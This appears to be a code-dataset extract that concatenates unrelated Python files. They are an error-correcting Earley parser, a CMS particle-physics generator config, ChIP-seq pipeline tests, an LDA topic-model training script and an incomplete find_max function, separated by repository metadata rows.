last_line_tokens = all_line_tokens.pop()
if len(last_line_tokens) > 1:
all_line_tokens.append(last_line_tokens[:-1])
all_line_tokens.append(token_list[tok_idx:])
elif fst_token[0] in Text and fst_token[1].replace(' ', '') == '':
this_indent = len(fst_token[1])
if indents == [] and this_indent > 0:
indents.append(this_indent)
all_line_tokens.append([(fst_token[0], '_INDENT_')] + token_list[1:])
elif indents == []:
all_line_tokens.append(token_list[1:])
elif indents[-1] == this_indent:
all_line_tokens.append(token_list[1:])
elif indents[-1] < this_indent:
indents.append(this_indent)
all_line_tokens.append([(fst_token[0], '_INDENT_')] + token_list[1:])
elif indents[-1] > this_indent:
dedents = 0
while indents[-1] > this_indent:
dedents += 1
indents.pop()
if indents == []:
break
all_line_tokens.append([(fst_token[0], '_DEDENT_')] * dedents + token_list[1:])
elif not(fst_token[0] in Text and fst_token[1].replace('\n', '') == '') and \
len(indents) > 0:
all_line_tokens.append([(Text, '_DEDENT_')] * len(indents) + token_list)
indents = []
else:
all_line_tokens.append(token_list)
if len(token_list) > 1:
lst_token = token_list[-2]
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '(':
paren_so_far += 1
elif tok[0] in Punctuation and tok[1] == ')':
paren_so_far -= 1
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '{':
curly_so_far += 1
elif tok[0] in Punctuation and tok[1] == '}':
curly_so_far -= 1
for tok in token_list:
if tok[0] in Punctuation and tok[1] == '[':
square_so_far += 1
elif tok[0] in Punctuation and tok[1] == ']':
square_so_far -= 1
lst_token_prev_line = lst_token[0] in Punctuation and lst_token[1] in ['\\', '{', '(', '[']
lst_token_prev_line |= lst_token[0] in Punctuation and lst_token[1] == ',' and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
lst_token_prev_line |= token_list[-1][0] in Text and token_list[-1][1] == '\\\n'
lst_token_prev_line |= lst_token[0] in Punctuation and lst_token[1] == ':' and curly_so_far > 0
lst_token_prev_line |= lst_token[0] in Operator and lst_token[1] in ['+', '-', '*', '/', '//', '%', '==', '!=', 'in', 'or', 'and'] and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
lst_token_prev_line |= lst_token[0] in String and (paren_so_far > 0 or curly_so_far > 0 or square_so_far > 0)
if len(indents) > 0:
all_line_tokens.append([(Text, '_DEDENT_')] * len(indents))
return all_line_tokens
def update_spaces_and_nls(self, all_lines):
def is_space(token):
return token[0] in Text and token[1].replace(' ', '') == ''
all_line_tokens = []
for token_list in all_lines:
token_list_no_spaces = list(filter(lambda tok: not is_space(tok), token_list))
last_token = token_list_no_spaces[-1]
if last_token[0] in Text and '\n' in last_token[1]:
all_line_tokens.append(token_list_no_spaces[:-1] + [(last_token[0], '_NEWLINE_')])
else:
all_line_tokens.append(token_list_no_spaces)
return all_line_tokens
def update_tokens(self, all_lines):
all_line_tokens = []
for token_list in all_lines:
new_token_list = []
prev_num = False
for tok in token_list:
if tok[0] in Number:
prev_num = True
else:
if prev_num and tok[0] in Name and tok[1] == 'j':
prev_tok = new_token_list.pop()
tok = (prev_tok[0], prev_tok[1] + 'j')
prev_num = False
new_token_list.append(tok)
new_token_list = list(map(self.choose_token_represent, new_token_list))
all_line_tokens.append(new_token_list)
return all_line_tokens
def choose_token_represent(self, token):
if token[0] in Name and token[1] != '.':
return '_NAME_'
elif token[0] in Number:
return '_NUMBER_'
elif token[0] in String:
return '_STRING_'
return token[1]
def update_tokens_with_actual(self, all_lines):
all_line_tokens = []
for token_list in all_lines:
new_token_list = []
prev_num = False
for tok in token_list:
if tok[0] in Number:
prev_num = True
else:
if prev_num and tok[0] in Name and tok[1] == 'j':
prev_tok = new_token_list.pop()
tok = (prev_tok[0], prev_tok[1] + 'j')
prev_num = False
new_token_list.append(tok)
# Abstract String tokens for now. Will insert them back later
new_token_list = list(map(lambda x: '_STRING_' if x[0] in String else x[1], new_token_list))
all_line_tokens.append(new_token_list)
return all_line_tokens
def final_cleaning(self, tokens, is_actual):
tokens.append('_ENDMARKER_')
tokens = " ".join(tokens)
tokens = tokens.replace('* *', "**")
tokens = tokens.replace('= =', "==")
tokens = tokens.replace('< =', "<=")
tokens = tokens.replace('> =', ">=")
tokens = tokens.replace('! =', "!=")
tokens = tokens.replace('< <', "<<")
tokens = tokens.replace("> >", ">>")
tokens = tokens.replace('& &', "&&")
tokens = tokens.replace('| |', "||")
tokens = tokens.replace('/ /', "//")
tokens = tokens.replace('+ =', "+=")
tokens = tokens.replace('- =', "-=")
tokens = tokens.replace('/ =', "/=")
tokens = tokens.replace('* =', "*=")
tokens = tokens.replace('>> =', ">>=")
tokens = tokens.replace('<< =', "<<=")
tokens = tokens.replace('&& =', "&&=")
tokens = tokens.replace('!! =', "!!=")
tokens = tokens.replace('// =', "//=")
tokens = tokens.replace('% =', "%=")
tokens = tokens.replace('@', "@ ")
tokens = tokens.replace('@ =', "@=")
tokens = tokens.replace('| =', "|=")
tokens = tokens.replace('& =', "&=")
tokens = tokens.replace('^ =', "^=")
# tokens = tokens.replace(", ;", ";")
tokens = tokens.replace(". . .", "...")
if not is_actual:
tokens = tokens.replace("not in", "not_in")
tokens = tokens.replace("is not", "is_not")
tokens = tokens.replace("- >", "_arrow_")
else:
tokens = tokens.replace("- >", "->")
while tokens.find('_STRING_ _STRING_') >= 0:
tokens = tokens.replace('_STRING_ _STRING_', '_STRING_')
while tokens.find(' : _NEWLINE_ _NEWLINE_ ') >= 0:
tokens = tokens.replace(' : _NEWLINE_ _NEWLINE_ ', ' : _NEWLINE_ ')
while tokens.find('. _NUMBER_') >= 0:
tokens = tokens.replace('. _NUMBER_', '_NUMBER_')
while tokens.find('_NEWLINE_ )') >= 0:
tokens = tokens.replace('_NEWLINE_ )', ')')
while tokens.find('_NEWLINE_ ]') >= 0:
tokens = tokens.replace('_NEWLINE_ ]', ']')
while tokens.find('_NEWLINE_ }') >= 0:
tokens = tokens.replace('_NEWLINE_ }', '}')
# print(tokens.replace('_NEWLINE_ ', '\n'))
if not is_actual:
tokens = " ".join(map(lambda t: t if t in self.terminals else '_UNKNOWN_', tokens.split()))
# print(tokens.replace('_NEWLINE_ ', '\n'))
return tokens
def read_grammar(grammar_file):
grammar = ErrorGrammar.load_grammar(grammar_file)
return grammar
def prog_has_parse(prog, grammar, terminals):
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.has_parse(), parser.chart
lexer = Lexer(terminals)
# tokenized_prog = lexer.lex(prog)
# print('-----------------')
# print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
# print('-----------------')
lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(prog.split('\ndef '))))
for lexed in lexed_funs:
parsed, _ = run_parse(lexed)
if parsed is None:
return False
elif not parsed:
return False
return True
def prog_error_rules(prog, grammar, terminals):
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.get_rules(), parser.chart
lexer = Lexer(terminals)
# alphabet = grammar.get_alphabet()
# print(alphabet)
# tokenized_prog = lexer.lex(prog)
# print('-----------------')
# print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
# print('-----------------')
# lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(prog.split('\ndef '))))
# error_rules = []
# for lexed in lexed_funs:
# parsed, _ = run_parse(lexed)
# if parsed is None:
# return []
# elif not parsed:
# return []
# # parse = ErrorEarleyParse(lexed, grammar)
# # parse.parse()
# # parse.get().pretty_print()
# error_rules.extend(list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed)))
lexed_prog = lexer.lex(prog)
error_rules = []
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return []
elif not parsed:
return []
# parse = ErrorEarleyParse(lexed_prog, grammar)
# parse.parse()
# parse.get().pretty_print()
# print(parsed)
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed))
# for rule in list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr' or any(map(lambda r: r.startswith('Err_') or r == 'InsertErr', er.rhs)), parsed)):
# print(rule)
return error_rules
def lexed_prog_has_parse(lexed_prog, grammar):
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar)
parser.parse()
return parser.get_rules(), parser.chart
error_rules = []
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return []
elif not parsed:
return []
# parse = ErrorEarleyParse(lexed_prog, grammar)
# parse.parse()
# parse.get().pretty_print()
# print(parsed)
error_rules = list(filter(lambda er: er.lhs.startswith('Err_') or er.lhs == 'InsertErr', parsed))
return error_rules
def rule_updates(st):
if st.rule.lhs.startswith('Err_'):
return st.rule.lhs.replace('Err_', '')
elif st.rule.lhs == 'InsertErr':
return None
else:
return st.rule.lhs
def rule_updates_rhs(grammar, st):
if st.rule.lhs.startswith('Err_'):
return grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0]
elif st.rule.lhs == 'InsertErr':
return None
else:
return st.rule.rhs[0]
def rule_updates_repair_operations(grammar, st):
if st.rule.lhs.startswith('Err_'):
if st.rule.rhs:
return '<<$' + grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0] + '$>>'
else:
return '<<+' + grammar[st.rule.lhs.replace('Err_', '')][0].rhs[0] + '+>>'
elif st.rule.lhs == 'InsertErr':
return '<<-' + st.rule.rhs[0] + '->>'
else:
return st.rule.rhs[0]
def get_repaired_seq_for_1(rule_sequences, grammar):
rule_seq = sorted(rule_sequences[0], key=lambda st: st.sent_pos)
abstract_fixed_seq = list(filter(lambda x: x, map(rule_updates, rule_seq)))
rul_upd = partial(rule_updates_rhs, grammar)
fixed_seq = list(filter(lambda x: x, map(rul_upd, rule_seq)))
rul_upd_repair_ops = partial(rule_updates_repair_operations, grammar)
fixed_seq_ops = list(filter(lambda x: x, map(rul_upd_repair_ops, rule_seq)))
return (' '.join(abstract_fixed_seq), ' '.join(fixed_seq), ' '.join(fixed_seq_ops), rule_sequences[1], rule_sequences[2])
def fixed_lexed_prog(lexed_prog, grammar, max_cost):
def run_parse(sentence):
parser = ErrorEarleyParse(sentence, grammar, max_cost)
parser.parse()
return parser.get_fixed_seq(), parser.chart
parsed, _ = run_parse(lexed_prog)
if parsed is None:
return [(None, None, None, None, None)]
elif not parsed:
return [(None, None, None, None, None)]
return list(map(lambda sol: get_repaired_seq_for_1(sol, grammar), parsed))
def repair_prog(actual_tokens, fix_seq_operations):
# Reverse program `actual_tokens` for efficient popping
actual_tkns = actual_tokens
actual_tkns = list(reversed(actual_tkns.split()))
repaired = ""
indents = ''
if " not_in " in fix_seq_operations:
fix_seq_operations = fix_seq_operations.replace(" not_in ", " not in ")
if " is_not " in fix_seq_operations:
fix_seq_operations = fix_seq_operations.replace(" is_not ", " is not ")
for tk in fix_seq_operations.split():
if tk.startswith('<<+'):
if tk[3:-3] == '_INDENT_':
indents += ' ' * 4
repaired += ' ' * 4
elif tk[3:-3] == '_DEDENT_':
indents = indents[4:]
repaired = repaired[:-4]
elif tk[3:-3] == '_NEWLINE_':
repaired += '\n'
repaired += indents
elif tk[3:-3] in ['pass', 'break', 'continue', 'return', 'yield']:
flag = (repaired[-2] == ':') if repaired else False
repaired += '\n'
repaired += indents
repaired += (' ' * 4 if flag else '') + tk[3:-3] + " "
elif tk[3:-3] == '_NAME_':
repaired += 'simple_name '
else:
repaired += tk[3:-3] + " "
elif tk.startswith('<<$'):
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
if tk[3:-3] == '_INDENT_':
indents += ' ' * 4
repaired += ' ' * 4
elif tk[3:-3] == '_DEDENT_':
indents = indents[4:]
repaired = repaired[:-4]
elif tk[3:-3] == '_NEWLINE_':
repaired += '\n'
repaired += indents
elif tk[3:-3] == '_NAME_':
repaired += 'simple_name '
elif tk[3:-3] in ['pass', 'break', 'continue', 'return', 'yield']:
flag = (repaired[-2] == ':') if repaired else False
repaired += '\n'
repaired += indents
repaired += (' ' * 4 if flag else '') + tk[3:-3] + " "
else:
repaired += tk[3:-3] + " "
elif tk.startswith('<<-'):
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
elif tk == '_INDENT_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
indents += ' ' * 4
repaired += ' ' * 4
elif tk == '_DEDENT_':
# Added checks because of problem with 6100+ in test set
# It was popping from the empty list
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
indents = indents[4:]
repaired = repaired[:-4]
elif tk == '_NEWLINE_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
repaired += '\n'
repaired += indents
elif tk == '_ENDMARKER_':
repaired += '\n'
elif tk == '_arrow_':
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
repaired += "-> "
elif tk in ['_NAME_', '_STRING_', '_NUMBER_']:
if actual_tkns:
repaired += actual_tkns.pop(-1) + " "
else:
return repaired
else:
if actual_tkns:
actual_tkns.pop(-1)
else:
return repaired
if tk == '[':
repaired += tk
elif tk in ['(', ')', ']', '.', ',', ':'] and len(repaired) > 0:
if tk == ',' or tk == ')' or tk == ':':
repaired = (repaired[:-1] if repaired[-1] == ' ' else repaired) + tk + " "
else:
repaired = (repaired[:-1] if repaired[-1] == ' ' else repaired) + tk
else:
repaired += tk + " "
return repaired
def concretize_seq(seq, grammar):
tags = seq.split()
tokens = [grammar[t][0].rhs[0] for t in tags]
return ' '.join(tokens)
def get_token_list(prog, terminals):
lexer = Lexer(terminals)
return lexer.lex(prog)
def get_actual_token_list(prog, terminals):
lexer = Lexer(terminals)
return lexer.clean_with_lex(prog)
def main():
"""
Main.
"""
parser_description = ("Runs the Earley parser according to a given "
"grammar.")
parser = argparse.ArgumentParser(description=parser_description)
parser.add_argument('draw', nargs='?', default=False)
parser.add_argument('grammar_file', help="Filepath to grammer file")
parser.add_argument('input_program', help="The input program to parse")
parser.add_argument('--show-chart', action="store_true")
args = parser.parse_args()
grammar = ErrorGrammar.load_grammar(args.grammar_file)
terminals = grammar.get_alphabet()
# grammar.update_error_grammar([')'], [']'])
def run_parse(sentence):
parse = ErrorEarleyParse(sentence, grammar)
parse.parse()
return parse.get_rules(), parse.chart
program_path = Path(args.input_program)
# # Strip the sentence of any puncutation.
# stripped_sentence = sentence
# for p in string.punctuation:
# stripped_sentence = stripped_sentence.replace(p, '')
input_program = program_path.read_text()
# print(input_program)
lexer = Lexer(terminals)
tokenized_prog = lexer.lex(input_program)
# print(parse(input_program))
# print(asttokens.ASTTokens(input_program, parse=True).tokens)
print(tokenized_prog.replace('_NEWLINE_ ', '\n'))
print('-----------------')
lexed_funs = filter(lambda f: f != '', map(lambda ff: lexer.lex('def ' + ff[1]) if ff[0] > 0 else lexer.lex(ff[1]), enumerate(input_program.split('\ndef '))))
for lexed in lexed_funs:
parsed, _ = run_parse(lexed)
if parsed is None:
print(False)
pass
elif not parsed:
print(False)
pass
# print(parsed)
# parsed.pretty_print()
print(True)
# parsed, chart = run_parse(tokenized_prog)
# if args.show_chart:
# print(chart)
# print('\n')
# if parsed is None:
# print(input_program + '\n')
# else:
# if args.draw:
# parsed.draw()
# else:
# print("True")
# # parsed.pretty_print()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4fd52351a670070b2a03c71c3135823c46cdb129 | 4526ed71f39d70111c3787ec90b4932a183c452c | /2016/Pyquen_WToMuNu_TuneZ2_8160GeV_pythia6_reverse_cfi.py | f47777dec69a0a32fa2aa7721bb9c36a5c2f145d | [] | no_license | CMS-HIN-dilepton/MCRequest | 773f414739efc529dc957a044232478b1c4f1c03 | ff49d22fde2c4a006fe7fa02d4cf53d794f91888 | refs/heads/master | 2021-05-02T12:16:51.891664 | 2020-06-20T18:35:52 | 2020-06-20T18:35:52 | 45,127,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,712 | py | import FWCore.ParameterSet.Config as cms
from Configuration.Generator.PythiaUEZ2Settings_cfi import *
generator = cms.EDFilter("PyquenGeneratorFilter",
comEnergy = cms.double(8160.0),
aBeamTarget = cms.double(208.0),
protonSide = cms.untracked.int32(2),
qgpInitialTemperature = cms.double(1.0), ## initial temperature of QGP; allowed range [0.2,2.0]GeV;
qgpProperTimeFormation = cms.double(0.1), ## proper time of QGP formation; allowed range [0.01,10.0]fm/c;
hadronFreezoutTemperature = cms.double(0.14),
doRadiativeEnLoss = cms.bool(True), ## if true, perform partonic radiative en loss
doCollisionalEnLoss = cms.bool(False),
qgpNumQuarkFlavor = cms.int32(0), ## number of active quark flavors in qgp; allowed values: 0,1,2,3
numQuarkFlavor = cms.int32(0), ## to be removed
doIsospin = cms.bool(True),
angularSpectrumSelector = cms.int32(0), ## angular emitted gluon spectrum :
embeddingMode = cms.bool(False),
backgroundLabel = cms.InputTag("generator"), ## ineffective in no mixing
doQuench = cms.bool(False),
bFixed = cms.double(0.0), ## fixed impact param (fm); valid only if cflag_=0
cFlag = cms.int32(0), ## centrality flag
bMin = cms.double(0.0), ## min impact param (fm); valid only if cflag_!=0
bMax = cms.double(0.0), ## max impact param (fm); valid only if cflag_!=0
pythiaPylistVerbosity = cms.untracked.int32(1),
pythiaHepMCVerbosity = cms.untracked.bool(True),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(pythiaUESettingsBlock,
processParameters = cms.vstring('MSEL = 0 !User defined processes',
'MSUB(2) = 1 !W production',
'MDME(190,1) = 0 !W decay into dbar u',
'MDME(191,1) = 0 !W decay into dbar c',
'MDME(192,1) = 0 !W decay into dbar t',
'MDME(194,1) = 0 !W decay into sbar u',
'MDME(195,1) = 0 !W decay into sbar c',
'MDME(196,1) = 0 !W decay into sbar t',
'MDME(198,1) = 0 !W decay into bbar u',
'MDME(199,1) = 0 !W decay into bbar c',
'MDME(200,1) = 0 !W decay into bbar t',
'MDME(205,1) = 0 !W decay into bbar tp',
'MDME(206,1) = 0 !W decay into e+ nu_e',
'MDME(207,1) = 1 !W decay into mu+ nu_mu',
'MDME(208,1) = 0 !W decay into tau+ nu_tau'),
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
)
)
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.1 $'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/GenProduction/python/HI/Pyquen_WToMuNu_TuneZ2_5023GeV_pythia6_cfi.py,v $'),
annotation = cms.untracked.string('PYQUEN-Wmunu Tune Z2 at 5.023 TeV')
)
#ProductionFilterSequence = cms.Sequence(hiSignal)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
b05505c9b445af3674a860fe8d4fd78dda734376 | b9cd1b9758e58f00335900fd120e1d47c23600ce | /tests/test_pipeline_chipseq.py | 543d39616238213767af72ed8a467fa36a735e65 | [
"Apache-2.0"
] | permissive | Multiscale-Genomics/mg-process-fastq | 4fb7fef68526237f06312a3f137df031a448731c | 50c7115c0c1a6af48dc34f275e469d1b9eb02999 | refs/heads/master | 2020-04-12T06:46:01.100270 | 2018-11-19T16:05:03 | 2018-11-19T16:05:03 | 64,320,140 | 2 | 4 | Apache-2.0 | 2018-11-16T16:54:54 | 2016-07-27T15:29:25 | Python | UTF-8 | Python | false | false | 7,060 | py | """
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from basic_modules.metadata import Metadata
from process_chipseq import process_chipseq
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_00():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome": Metadata(
"Assembly", "fasta", files['genome'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index": Metadata(
"Index", "bwa_index", files['index'], files['genome'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_01():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome_public": Metadata(
"Assembly", "fasta", files['genome_public'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index_public": Metadata(
"Index", "bwa_index", files['index_public'], files['genome_public'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
| [
"[email protected]"
] | |
c4e2b115dbe1fb2ca6e5626b223b88a4f3dde73e | b0e67fbd4c42aba24f7d4bccb99e9aa037c0b7d5 | /lda/train_LDA.py | 39ade7589cc4a9b7f6176b106691125a03142547 | [] | no_license | gombru/SocialMediaWeakLabeling | f979aea8218be115758ff8e1e9a945a701ac99b9 | 518437903ba7370a4098303a41196a08f1d6a58e | refs/heads/master | 2022-02-26T17:49:08.997335 | 2022-02-10T12:54:57 | 2022-02-10T12:54:57 | 84,461,511 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py | # Trains and saves an LDA model with the given text files.
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import glob
import string
import random
import numpy as np
whitelist = string.letters + string.digits + ' '
instagram_text_data_path = '../../../datasets/SocialMedia/captions_resized_1M/cities_instagram/'
model_path = '../../../datasets/SocialMedia/models/LDA/lda_model_cities_instagram_1M_500_5000chunck.model'
words2filter = ['rt','http','t','gt','co','s','https','http','tweet','markars_','photo','pictur','picture','say','photo','much','tweet','now','blog']
cities = ['london','newyork','sydney','losangeles','chicago','melbourne','miami','toronto','singapore','sanfrancisco']
num_topics = 500
threads = 8
passes = 1 #Passes over the whole corpus
chunksize = 5000 #Update the model every 10000 documents
# See https://radimrehurek.com/gensim/wiki.html
update_every = 1
repetition_threshold = 20
#Initialize Tokenizer
tokenizer = RegexpTokenizer(r'\w+')
# create English stop words list
en_stop = get_stop_words('en')
# add own stop words
for w in words2filter:
en_stop.append(w)
# Create p_stemmer of class PorterStemmer
p_stemmer = PorterStemmer()
posts_text = []
texts = [] #List of lists of tokens
# -- LOAD DATA FROM INSTAGRAM --
for city in cities:
print "Loading data from " + city
for file_name in glob.glob(instagram_text_data_path + city + "/*.txt"):
caption = ""
filtered_caption = ""
file = open(file_name, "r")
for line in file:
caption = caption + line
# Replace hashtags with spaces
caption = caption.replace('#', ' ')
# Keep only letters and numbers
for char in caption:
if char in whitelist:
filtered_caption += char
posts_text.append(filtered_caption.decode('utf-8').lower())
# print filtered_caption.decode('utf-8')
print "Number of posts: " + str(len(posts_text))
print "Creating tokens"
c= 0
for t in posts_text:
c += 1
if c % 10000 == 0:
print c
try:
t = t.lower()
tokens = tokenizer.tokenize(t)
# remove stop words from tokens
stopped_tokens = [i for i in tokens if not i in en_stop]
# stem token
text = [p_stemmer.stem(i) for i in stopped_tokens]
# add proceced text to list of lists
texts.append(text)
except:
continue
#Remove element from list if memory limitation TODO
#del tweets_text[0]
posts_text = []
# Remove words that appear less than N times
print "Removing words appearing less than: " + str(repetition_threshold)
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > repetition_threshold] for text in texts]
# Construct a document-term matrix to understand how frewuently each term occurs within each document
# The Dictionary() function traverses texts, assigning a unique integer id to each unique token while also collecting word counts and relevant statistics.
# To see each token unique integer id, try print(dictionary.token2id)
dictionary = corpora.Dictionary(texts)
print(dictionary)
# TODO check this
# dictionary.compactify()
# Filter out tokens that appear in less than no_below documents (absolute number) or more than no_above documents (fraction of total corpus size, not absolute number).
# after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
# dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)
# dictionary.compactify() # remove gaps in id sequence after words that were removed
# Convert dictionary to a BoW
# The result is a list of vectors equal to the number of documents. Each document containts tumples (term ID, term frequency)
corpus = [dictionary.doc2bow(text) for text in texts]
texts = []
#Randomize training elements
corpus = np.random.permutation(corpus)
# Generate an LDA model
print "Creating LDA model"
# the minimum_probability=0 argument is necessary in order for
# gensim to return the full document-topic-distribution matrix. If
# this argument is omitted and left to the gensim default of 0.01,
# then all document-topic weights below that threshold will be
# returned as NaN, violating the subsequent LDAvis assumption that
# all rows (documents) in the document-topic-distribution matrix sum
# to 1.
#ldamodel = models.ldamodel.LdaModel(corpus, num_topics=num_topics, id2word = dictionary, passes=passes, minimum_probability=0)
ldamodel = models.LdaMulticore(corpus, num_topics=num_topics, id2word = dictionary, chunksize=chunksize, passes=passes, workers=threads, minimum_probability=0)
ldamodel.save(model_path)
# Our LDA model is now stored as ldamodel
print(ldamodel.print_topics(num_topics=8, num_words=10))
print "DONE"
| [
"[email protected]"
] | |
09b194ff61b3e409331b5fb117555aaaa998c26a | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/find_max_20200722114432.py | 63139ffb63e0f85ee0899b804e0ff82130382654 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | items = [6,20,8,19,56,23,87,41,49,53]
def find_max(items):
# Breaking condition
if len(items) == 1:
return items[0]
op1 = items[0]
op2 = find_max(items[1:])
| [
"[email protected]"
] | |
